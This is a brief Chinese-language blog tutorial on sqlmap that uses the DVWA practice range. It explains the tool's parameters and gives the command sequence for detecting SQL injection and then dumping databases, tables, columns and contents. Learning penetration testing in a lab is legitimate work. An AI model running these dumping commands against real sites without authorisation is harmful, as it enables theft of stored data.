标签:数据 ble mic 文章 sqlmap 指定字段 server 通过 自动化
0x00 sqlmap简介:
sqlmap基于python环境下使用,可运行于win系统和linux系,主要是看大家的习惯使用即可。
sqlmap支持的数据库有:(MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB)
本文章以dvwa靶场做实验。
0x01 sqlmap 的参数介绍:
-u #注入点
--dbs #列出所有数据库
--tables #列出所有表名
--columns #列出字段
--dump-all #列出所有数据库所有表
-D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段
0x02 sqlmap的测试步骤:
sqlmap -u “url”
探测到了有注入漏洞,就可以往下一步进行了
暴库:
sqlmap -u “url” --dbs #通过探测知道是那个数据库,可以用--dbms 数据库,探测指定的数据库,这样速度会快一点
爆表:
sqlmap -u “url” -D “数据库” --tables
爆字段:
sqlmap -u “url” -D “数据库” -T “表名” --columns
爆内容:
sqlmap -u “url” -D “数据库” -T “表名” -C “字段” --dump
标签:数据 ble mic 文章 sqlmap 指定字段 server 通过 自动化
原文地址:https://www.cnblogs.com/wufengins/p/13584155.html